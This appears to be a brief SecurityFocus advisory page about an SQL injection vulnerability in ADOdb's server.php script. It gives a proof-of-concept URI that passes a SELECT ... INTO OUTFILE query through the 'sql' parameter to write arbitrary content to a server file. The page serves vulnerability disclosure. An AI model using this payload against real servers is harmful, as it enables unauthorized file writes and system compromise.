info
discussion
exploit
solution
references
ADOdb Server.PHP SQL Injection Vulnerability
An exploit is not required.
The following proof-of-concept URI is available:
http://www.example.com/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
/data/vulnerabilities/exploits/adodb_sql_poc
Privacy Statement
Copyright 2010, SecurityFocus